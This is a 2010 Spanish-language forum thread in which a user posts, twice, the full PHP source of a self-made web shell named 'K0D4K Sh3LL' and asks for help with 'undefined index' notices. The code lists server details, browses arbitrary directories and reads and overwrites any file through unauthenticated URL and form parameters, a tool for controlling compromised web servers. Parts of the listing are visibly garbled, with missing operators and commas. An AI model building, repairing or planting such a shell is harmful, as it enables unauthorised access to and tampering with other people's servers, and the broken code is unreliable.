problema en codigo :(

Iniciado por Dr [F], 1 Agosto 2010, 06:24 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2
Acciones del Usuario

Zazú

#10
2 Agosto 2010, 06:29 AM
Ya se lo solucione ayer por privado ;)


:silbar:

Dr [F]

#11
3 Agosto 2010, 00:15 AM
Muchas gracias zazú, les dejo el codigo y algo que esta molestando :

Código (php-brief) [Seleccionar]
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;

font-family:monospace;
}

datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}


carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}

directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}

table
{
font-size:13px;
  border-collapse: collapse;
}

th
{
  border-right: 1px solid #000;
  border-bottom: 1px solid #000;
  padding: 0.5em;
  background-color:#FF8000;
}

corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}

signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}

k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}

cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}

guion{
color:#FF8000;
font-size:25px;
}


a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}

datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}


</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  <br><br>     <center>
 
    <center>     <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">

<center>         <br>

<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a>  <br>
<a href="?shell=creditos">Creditos</a>     <br>


</div></center></center>
<br>

<?php
if($_GET['shell']=="datos") {     // si lo devuelto por shell == datos
$ROOT=$_SERVER["DOCUMENT_ROOT"];     // variable para saber donde esta instalado el wamp
$SADMIN=$_SERVER["SERVER_ADMIN"];           //mail admin
$SELF=$_SERVER["PHP_SELF"];                //
$servers=$_SERVER['SERVER_SOFTWARE'];    //version del software
$ipserver=$_SERVER['SERVER_ADDR'];      //ip del serviodr
$lugarshell=$_SERVER['SCRIPT_FILENAME'];                 //lugar donde esta nuestro archivo
$sname $_SERVER['SERVER_NAME'];                  // nombre del servidor
$port$_SERVER['SERVER_PORT'];                  //puerto para realizar la conexion
$hconection$_SERVER['HTTP_CONNECTION'];
$haceptlanguaje=$_SERVER['HTTP_ACCEPT_LANGUAGE']; //header accept-language
$hencoding=$_SERVER['HTTP_ACCEPT_ENCODING'];      //header encoding
$hcharset =$_SERVER['HTTP_ACCEPT_CHARSET'];        // header charset
$hmetod =$_SERVER['REQUEST_METHOD'];                // header method
$hproto $_SERVER['SERVER_PROTOCOL'];
echo "<br><br><br><br>";
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Server name: ";
echo "</datos>";
echo "<datitos>";
echo $sname;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Instalado en: ";
echo "</datos>";
echo "<datitos>";
echo $ROOT;
echo "</datitos><br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
echo "<datos><BR>";
echo "Mail Admin: ";
echo "</datos>";
echo "<datitos>";
echo $SADMIN;
echo "</datitos><BR>";
echo "<datos>";
echo "Puerto usado para la conexion: ";
echo "</datos>";
echo "<datitos>";
echo $port;
echo "</datitos>";
echo "</info>";
echo "<br><br><br>";
 echo "<carteles>";
echo "Headers:<br><br>";
echo "</carteles>";
echo "<datos>";
echo "Header Connection: ";
echo "</datos>";
echo "<datitos>";
echo $hconection;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Language: ";
echo "</datos>";
echo "<datitos>";
echo $haceptlanguaje;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Encoding: ";
echo "</datos>";
echo "<datitos>";
echo $hencoding;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Charset: ";
echo "</datos>";
echo "<datitos>";
echo $hcharset;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Method: ";
echo "</datos>";
echo "<datitos>";
echo $hmetod;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Protocol Version: ";
echo "</datos>";
echo "<datitos>";
echo $hproto;
echo "</datitos>";
echo "</info><br>";
}   //cierro if de si shell == datos
else {                              //de lo contrario (si shell no es == datos


if(isset($_GET['path'])) {         // si la variable path tiene algo
$path $_GET['path'];                                              //almaceno en path lo devuelvo por $_get[path]
$dir dir($path);  // dir = dir(ruta que devolvio get
}     // cierro if
else {      // de lo contrario si no esta definido get path
$path getcwd();        //$path toma el valor del directorio actual
$dir dir($path);
}        //cierro else

if($_GET['shell'] == "archivo" OR $_GET['path']!== ""  ) {

echo "<br>";
 echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";

           echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
"</carteles>";
$contador 0;
while ($file $dir->read()) {
$extension filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";

echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";


if(isset($_GET['view'])) {
$ruta $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";

echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto fread($abrirfilesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";

echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta"w+");
$txt=$_POST['modi'];
@$ok fwrite($arc,$txt);
}
}
}

if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");

}
}
?>
</body>
</html>

Bueno, les comento el problema:

al ir a la pestaña informacion del servidor, ningun problema, pero
cuando vamos a ver archivos y empezamos a explorar rutas, saltan diferentes errores:


Código [Seleccionar]
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 133

Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 259

y cuando utilizamos la variable view= para modificar los archivos estos:

Código [Seleccionar]


Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 133

Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 259

Notice: Undefined index: path in C:\wamp\www\shel\kodak.php on line 259

ya se que me van a decir, es que no definiste las variables, pero el problema es qe no se como hacerlo, ya probe añadiendo un par de OR a las sentencias anteriores y nada :/
Muchas gracias :)w

disculpen que reabra el tema :=(         :-[
saludos  :D
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Shell Root

#12
3 Agosto 2010, 00:35 AM
Por lo menos YO, no miraré el código, hasta que por lo menos lo tengas ordenado. Es muy difícil verlo así como lo tienes. Además de especificar las lineas en las que se dá el error.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Dr [F]

#13
3 Agosto 2010, 03:33 AM
Shell te ordene el code  ;) cuando tenngas un minuto, mira el post anterior y respondeme  :silbar: jaja


Código (php-brief) [Seleccionar]

<html>
<head>
<title> K0D4K Sh3LL! </title>

<style type="text/css">


body {

background-color:#000000;
cursor:crosshair;
font-family:monospace;
}

datito {

color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}


cartele {

font-size:20px;
color:#FF8000;
font-weight:bold;
}

directorio {

font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;

}

table {

font-size:13px;
border-collapse: collapse;

}

th {
border-right: 1px solid #000;
border-bottom: 1px solid #000;
padding: 0.5em;
background-color:#FF8000;

}

corchetes {

color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}

signos {

font-weight:bold;
color:#FF8000;
font-size:24px;
}

k {

color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}

cero {

color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}

guion {

color:#FF8000;
font-size:25px;
}


a:link {

font-size:15px;
color:red;
text-decoration:none;
}

a:visited {

color:red;
text-decoration:none;

}

a:hover {

cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}

datos {

font-size:medium;
color:#FF8000;
font-family:verdana;
}


</style>
</head>
<body>
<center>
<corchetes>[</corchetes> <signos>!</signos> <corchetes>]</corchetes> <k> K</k> <cero>0</cero> <k>D</k>
<cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
<br><br>     
</center>
<center>     
<br>
<br>

<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">

<br>

<a href="?shell=archivo"> Ver Archivos</a>
<br>
<a href="?shell=datos"> Informacion Del Servidor</a>
<br>
<a href="?shell=phpinfo"> Link3</a>
<br>
<a href="?shell=creditos">Creditos</a>
<br>


</div>
</center>
</center>
<br>

<?php
if($_GET['shell']=="datos") {     // si lo devuelto por shell == datos
 $ROOT=$_SERVER["DOCUMENT_ROOT"];     // variable para saber donde esta instalado el wamp
 $SADMIN=$_SERVER["SERVER_ADMIN"];           //mail admin
 $SELF=$_SERVER["PHP_SELF"];                //
 $servers=$_SERVER['SERVER_SOFTWARE'];    //version del software
 $ipserver=$_SERVER['SERVER_ADDR'];      //ip del serviodr
 $lugarshell=$_SERVER['SCRIPT_FILENAME'];                 //lugar donde esta nuestro archivo
 $sname $_SERVER['SERVER_NAME'];                  // nombre del servidor
 $port$_SERVER['SERVER_PORT'];                  //puerto para realizar la conexion
 $hconection$_SERVER['HTTP_CONNECTION'];
 $haceptlanguaje=$_SERVER['HTTP_ACCEPT_LANGUAGE']; //header accept-language
 $hencoding=$_SERVER['HTTP_ACCEPT_ENCODING'];      //header encoding
 $hcharset =$_SERVER['HTTP_ACCEPT_CHARSET'];        // header charset
 $hmetod =$_SERVER['REQUEST_METHOD'];                // header method
 $hproto $_SERVER['SERVER_PROTOCOL'];


 echo "<br><br><br><br>";
 echo "<carteles>";
 echo "Datos del servidor:";
 echo "</carteles>";
 echo "<br><br><br>";
 echo "<datos>";
 echo "Version de software: ";
 echo "</datos>";
 echo "<datitos>";
 echo $servers;
 echo "</datitos>";
 echo "</info>";
 echo "<br>";
 echo "<datos>";
 echo "IP del servidor: ";
 echo "</datos>";
 echo "<datitos>";
 echo $ipserver;
 echo "</datitos>";
 echo "<br>";
 echo "<datos>";
 echo "Server name: ";
 echo "</datos>";
 echo "<datitos>";
 echo $sname;
 echo "</datitos>";
 echo "<br>";
 echo "<datos>";
 echo "Instalado en: ";
 echo "</datos>";
 echo "<datitos>";
 echo $ROOT;
 echo "</datitos><br>";
 echo "<datos>";
 echo "Directorio shell: ";
 echo "</datos>";
 echo "<datitos>";
 echo $lugarshell;
 echo "</datitos>";
 echo "<datos><BR>";
 echo "Mail Admin: ";
 echo "</datos>";
 echo "<datitos>";
 echo $SADMIN;
 echo "</datitos><BR>";
 echo "<datos>";
 echo "Puerto usado para la conexion: ";
 echo "</datos>";
 echo "<datitos>";
 echo $port;
 echo "</datitos>";
 echo "</info>";
 echo "<br><br><br>";
 echo "<carteles>";
 echo "Headers:<br><br>";
 echo "</carteles>";
 echo "<datos>";
 echo "Header Connection: ";
 echo "</datos>";
 echo "<datitos>";
 echo $hconection;
 echo "</datitos>";
 echo "</info><br>";
 echo "<datos>";
 echo "Header Accept-Language: ";
 echo "</datos>";
 echo "<datitos>";
 echo $haceptlanguaje;
 echo "</datitos>";
 echo "</info><br>";
 echo "<datos>";
 echo "Header Encoding: ";
 echo "</datos>";
 echo "<datitos>";
 echo $hencoding;
 echo "</datitos>";
 echo "</info><br>";
 echo "<datos>";
 echo "Header Accept-Charset: ";
 echo "</datos>";
 echo "<datitos>";
 echo $hcharset;
 echo "</datitos>";
 echo "</info><br>";
 echo "<datos>";
 echo "Header Method: ";
 echo "</datos>";
 echo "<datitos>";
 echo $hmetod;
 echo "</datitos>";
 echo "</info><br>";
 echo "<datos>";
 echo "Protocol Version: ";
 echo "</datos>";
 echo "<datitos>";
 echo $hproto;
 echo "</datitos>";
 echo "</info><br>";
}  

else {                           


 if(isset($_GET['path'])) {       
$path $_GET['path'];                                           
 $dir dir($path);  
}    
else {      
 $path getcwd();       
 $dir dir($path);
}       

if($_GET['shell'] == "archivo" OR $_GET['path']!== ""  ) {

 echo "<br>";
 echo "<div align=right>";
 echo "<table><tr>";
 echo "<th>Posicion:</th><th>";
 echo "$path";
 echo "</th>";
 echo "</table>";
 echo "</div>";
 echo "</chica>";
 echo "<br>";
        echo "<center>";
 echo "<carteles><br>";
 echo "Directorios:<br>";
 echo "</carteles>";
 $contador 0;
 while ($file $dir->read()) {
 $extension filetype($path."/".$file);
 if ($extension == "dir") {
 $contador+=1;
 $ruta urlencode($path."/".$file);
 echo "<directorios>";
 echo "<a href=?path=".$ruta.">".$file."</a><br>";

}

}

echo "</directorios>";
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file $dir->read()) {
 $extension=filetype($path."/".$file);
 if ($extension !=="dir") {
 $contador+=1;
 $ruta=urlencode($path."/".$file);
 echo "<directorios>";
 echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
 if ($contador==0) {
 echo "No hay archivos en el directorio";
}

echo "<br><br>";
echo "</center>";
 $dir->close();
echo "</directorios>";


if(isset($_GET['view'])) {
 $ruta $_GET['view'];
 echo "<h2><font color=orange><center>";
 echo "Editando: $ruta";
 echo "</font></center></h2>";
 echo "<center>";
 echo "<form method=POST action=\"\">";
 echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
 $abrir=fopen($ruta,"r");
 $texto fread($abrirfilesize($ruta));
 echo htmlentities($texto);
 echo "</textarea></div>";
 echo "<input type=submit name=\"Change\" value=\"Editar\">";
 echo "</form>";
 echo "</center>";
 if(isset($_POST['Change'])) {
 $arc=fopen($ruta"w+");
 $txt=$_POST['modi'];
 @$ok fwrite($arc,$txt);
}
}
}

if($_GET['shell'] == "creditos") {
 header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");

}
//cierro el primer if de control
?>
</body>
</html>



Por cierto los errores se encuentran en:

Código [Seleccionar]
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 161

Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 291

Notice: Undefined index: path in C:\wamp\www\shel\kodak.php on line 291


line 161:

Código [Seleccionar]
if($_GET['shell']=="datos") {

line 291:
Código [Seleccionar]
if($_GET['shell'] == "archivo" OR $_GET['path']!== ""  ) {

Saludos :) ;-)
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Shell Root

#14
3 Agosto 2010, 03:46 AM
jjojo que raro a mí no me aparece ningún error.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Imprimir
Ir Arriba Páginas 1 2
Acciones del Usuario